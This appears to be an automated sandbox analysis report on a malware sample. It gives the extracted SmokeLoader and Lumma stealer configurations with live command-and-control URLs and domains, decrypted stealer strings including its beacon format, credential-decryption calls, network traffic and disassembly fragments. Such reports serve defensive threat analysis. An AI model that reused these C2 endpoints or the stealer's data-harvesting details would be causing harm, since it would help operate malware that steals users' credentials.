                  Source: 00000005.00000002.2008625039.0000000002510000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
                  Source: 8.3.60FC.exe.298faf10000.3.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop", "callosallsaospz.shop"], "Build id": "bOKHNM--"}
                  Multi AV Scanner detection for domain / URL
                  Source: callosallsaospz.shopVirustotal: Detection: 19%Perma Link
                  Source: mussangroup.comVirustotal: Detection: 13%Perma Link
                  Source: callosallsaospz.shopVirustotal: Detection: 19%Perma Link
                  Source: liernessfornicsa.shopVirustotal: Detection: 19%Perma Link
                  Source: shepherdlyopzc.shopVirustotal: Detection: 19%Perma Link
                  Source: upknittsoappz.shopVirustotal: Detection: 19%Perma Link
                  Source: https://mussangroup.com/wp-content/images/pic1.jpgVirustotal: Detection: 6%Perma Link
                  Source: unseaffarignsk.shopVirustotal: Detection: 22%Perma Link
                  Source: https://callosallsaospz.shop/apiVirustotal: Detection: 22%Perma Link
                  Source: lariatedzugspd.shopVirustotal: Detection: 19%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeReversingLabs: Detection: 50%
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeVirustotal: Detection: 70%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeReversingLabs: Detection: 70%
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeVirustotal: Detection: 72%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dllReversingLabs: Detection: 41%
                  Source: C:\Users\user\AppData\Roaming\sbttifbReversingLabs: Detection: 36%
                  Multi AV Scanner detection for submitted file
                  Source: file.exeReversingLabs: Detection: 36%
                  Source: file.exeVirustotal: Detection: 42%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\sbttifbJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: indexterityszcoxp.shop
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: lariatedzugspd.shop
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: callosallsaospz.shop
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: outpointsozp.shop
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: liernessfornicsa.shop
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: upknittsoappz.shop
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: shepherdlyopzc.shop
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: unseaffarignsk.shop
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: callosallsaospz.shop
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString decryptor: bOKHNM--
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_001F7A10 CryptUnprotectData,13_2_001F7A10
                  Source: 6267.exe, 00000006.00000003.2434332291.000001925F231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_349192ac-a
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49756 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49762 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.4:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49772 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49774 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49776 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49777 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49778 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49780 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49781 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49783 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49784 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49785 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49786 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49787 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49788 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49789 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49790 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49791 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49792 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49793 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49794 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49796 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49797 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49798 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49799 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49800 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49801 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 192.168.2.4:49801 -> 167.235.128.153:443 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49802 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49803 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49804 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49805 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49806 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49807 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49808 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49809 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49810 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49811 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49812 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49813 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49814 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49815 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49816 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49817 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49818 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49820 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49821 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 192.168.2.4:49821 -> 107.173.160.137:443 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49822 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49824 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49825 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49826 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49828 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49829 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49831 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49832 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49833 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49835 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49836 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49837 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49838 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49840 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49841 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49842 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49844 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49845 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49846 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49848 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49849 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49850 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49852 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49853 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49855 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49856 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49857 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49859 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49860 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49862 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49863 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49864 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49866 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49867 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49868 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49870 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49871 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49873 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49874 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49875 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49877 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49878 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49880 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49881 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49882 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49884 version: TLS 1.2
                  Source: Binary string: softy.pdb source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C2B2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2706105355.0000020F4C353000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rust_dave_sideload.pdb source: g2m.dll.14.dr
                  Source: Binary string: BitLockerToGo.pdb source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000003.2555218278.00000298FAF70000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000002.2595446513.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000002.2595446513.000000C00084E000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000003.2555066474.00000298FAFB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 0000000E.00000002.2663864981.0000020F351B0000.00000004.00000800.00020000.00000000.sdmp, lm.exe.14.dr
                  Source: Binary string: softy.pdbat} source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C2B2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C210000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbm source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C2B2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: *n.pdb source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C2B2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ndll\mscorlib.pdbu0 source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C210000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.IO.Compression.pdb source: powershell.exe, 0000000E.00000002.2706536485.0000020F4C388000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: BitLockerToGo.pdbGCTL source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000003.2555218278.00000298FAF70000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000002.2595446513.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000002.2595446513.000000C00084E000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000003.2555066474.00000298FAFB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ll\mscorlib.pdb source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C210000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb5 source: powershell.exe, 0000000E.00000002.2706105355.0000020F4C353000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 0000000E.00000002.2663864981.0000020F351B0000.00000004.00000800.00020000.00000000.sdmp, lm.exe.14.dr
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+54h]13_2_001F7189
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx13_2_001F7189
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+50h]13_2_001F91C0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+54h]13_2_001F72DD
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx13_2_001F72DD
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp]13_2_00219C20
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]13_2_0021A479
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp+30h]13_2_001EFCB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp+00000200h]13_2_001EFCB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]13_2_001F6CB0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push eax13_2_00213CD0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+70h]13_2_001F7DEB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h13_2_001F7DEB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax13_2_001F2E51
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]13_2_00217E80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+00000820h]13_2_00206F80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+1Ch]13_2_00206F80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx13_2_00206F80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+50h]13_2_00206F80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h13_2_001FD810
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]13_2_001EA000
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax13_2_0021B840
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax13_2_0021B840
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ecx], ax13_2_001F5871
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h13_2_001FE086
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax13_2_001FE086
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]13_2_00218880
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax13_2_001E38D0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]13_2_001F30F6
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h13_2_001F30F6
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]13_2_001F1937
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h13_2_001FB920
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]13_2_001FB920
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx13_2_0021B160
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax13_2_0021B160
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax13_2_0021B160
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]13_2_0020617A
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [ebx+eax*4]13_2_001E8960
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]13_2_001E8960
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [00224970h]13_2_002041A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea ebp, dword ptr [esp+03h]13_2_00206210
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], 0000h13_2_001F3A2A
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]13_2_001E3260
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]13_2_001E3A80
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h13_2_001F82CB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx13_2_0021B350
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax13_2_0021B350
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax13_2_0021B350
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]13_2_001FB360
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h13_2_002033B6
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h13_2_00204BF0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [00224A9Ch]13_2_00204BF0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]13_2_00211BF0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esi+08h]13_2_001F43E5
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax13_2_001FEC06
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]13_2_001EE450
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h13_2_001F1D52
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx13_2_0021B5A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax13_2_0021B5A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax13_2_0021B5A0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]13_2_001E2DD0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]13_2_002065F0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+10h]13_2_001F3DE6
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax13_2_001F3678
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]13_2_001F4E68
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h13_2_001F4E68
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]13_2_001F4E68
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then inc ebx13_2_001F66B0
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]13_2_001F6EF8
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx13_2_0021B700
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax13_2_0021B700
